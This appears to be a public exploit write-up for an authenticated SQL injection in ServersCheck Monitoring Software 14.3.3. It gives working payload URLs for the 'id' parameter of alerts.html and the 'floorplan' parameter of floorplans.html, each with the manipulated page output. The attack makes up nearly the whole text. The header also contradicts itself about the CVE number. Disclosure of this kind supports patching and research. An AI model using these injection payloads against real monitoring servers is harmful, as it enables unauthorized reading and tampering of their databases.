# Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
# Author: John Page (aka hyp3rlinx)
# Date: 2018-10-23
# Vendor: www.serverscheck.com
# Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe
# CVE: N/A

# References:
# https://serverscheck.com/monitoring-software/release.asp
# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt

# Security Issue
# ServersCheck Monitoring Software allows for SQL Injection by an authenticated user
# via the alerts.html "id" parameter.

# Exploit/POC
http://127.0.0.1:1272/alerts.html?id=18391

Result:
Alerts History for SENSORXY
No data available in table

Then using 'OR+2=2,
http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+

Result:
Alerts History for test
155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK
154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN
153 a day ago test Status Change OK to DOWN Unable to connect to host

# SQL Injection - original page results successfully manipulated using 18391-2
# Examples:
http://127.0.0.1:1272/alerts.html?id=18391
No data available in table

Then using 34 minus 2,
http://127.0.0.1:1272/alerts.html?id=18391-2
153 a day ago test Status Change OK to DOWN Unable to connect to host

and minus 1,
http://127.0.0.1:1272/alerts.html?id=18391-1
155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK
154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN

http://127.0.0.1:1272/floorplans.html?floorplan=34
Floor Plan PLANXY

Then using 34 minus 2,
http://127.0.0.1:1272/floorplans.html?floorplan=34-2
Floor Plan 0